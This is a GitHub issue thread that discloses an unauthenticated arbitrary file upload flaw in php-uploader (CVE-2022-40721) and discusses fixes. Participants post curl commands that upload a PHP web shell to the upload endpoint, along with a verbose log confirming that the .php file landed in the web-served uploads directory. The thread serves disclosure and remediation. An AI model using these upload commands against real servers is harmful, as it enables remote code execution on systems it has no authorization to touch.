php-uploader icon indicating copy to clipboard operation
php-uploader copied to clipboard

Published 20 hours ago verified publisher icon CreativeDream

Arbitrary file uploads

Open lcashdol opened this issue 6 years ago • 8 comments

By defaut, this code allows arbitrary file uploads to the web server's path. This will allow any unauthenticated user to upload a PHP file to the web server's path and execute it.

lcashdol avatar Feb 19 '19 18:02 lcashdol

curl -vk site/[path]/default/php/ajax_upload_file.php -F "[email protected]" -F "files=b.php" -F "upload_dir=dir"

bscript avatar Nov 26 '19 14:11 bscript

Hi, Which solution did you use to prevent this?

lenamtl avatar Aug 31 '22 13:08 lenamtl

You'd need to modify the code to either store uploaded files in a path not in the web root or filter what types of files are allowed to be uploaded.

lcashdol avatar Sep 07 '22 16:09 lcashdol

So does setting the 'uploadDir' => null, for dir will prevent this when called directly?

protected $options = array(
        'limit' => null,
        'maxSize' => null,
        'extensions' => array('JPG', 'jpg'), 
        'required' => false, 
        'uploadDir' => null,
        'title' => array('auto', 10),
        'removeFiles' => true,
        'perms' => null,
        'replace' => true,
        'onCheck' => null,
        'onError' => null,
        'onSuccess' => null,
        'onUpload' => null,
        'onComplete' => null,
        'onRemove' => null
    );

And how this command can be run from the browser or how can I try to reproduce it so I can test the fix?

Thanks

lenamtl avatar Sep 09 '22 19:09 lenamtl

I'd make the uploadDir /var/tmp

lcashdol avatar Sep 14 '22 13:09 lcashdol

bscript's above exploit will work to test from the Linux command line.

lcashdol avatar Sep 19 '22 14:09 lcashdol

My exploit looked like this:

$ curl -vk http://localhost/php-uploader/examples/upload.php -F "[email protected]"

  • Trying ::1...
  • TCP_NODELAY set
  • Connected to localhost (::1) port 80 (#0)

POST /php-uploader/examples/upload.php HTTP/1.1 Host: localhost User-Agent: curl/7.52.1 Accept: / Content-Length: 9376 Expect: 100-continue Content-Type: multipart/form-data; boundary=------------------------9acb3f20a7222918

< HTTP/1.1 100 Continue < HTTP/1.1 200 OK < Date: Tue, 20 Sep 2022 16:15:13 GMT < Server: Apache/2.4.25 (Debian) < Vary: Accept-Encoding < Content-Length: 734 < Content-Type: text/html; charset=UTF-8 < Array ( [files] => Array ( [0] => uploads/09ENdXG85W.php )

[metas] => Array
    (
        [0] => Array
            (
                [date] => Tue, 20 Sep 2022 12:15:13 -0400
                [extension] => php
                [file] => uploads/09ENdXG85W.php
                [name] => 09ENdXG85W.php
                [old_name] => shell.php
                [replaced] => 
                [size] => 9174
                [size2] => 8.96 KB
                [type] => Array
                    (
                        [0] => application
                        [1] => octet-stream
                    )

            )

    )

)

  • Curl_http_done: called premature == 0
  • Connection #0 to host localhost left intact

lcashdol avatar Sep 20 '22 16:09 lcashdol

I'm going to assign a CVEid of CVE-2022-40721 to track this.

lcashdol avatar Sep 20 '22 19:09 lcashdol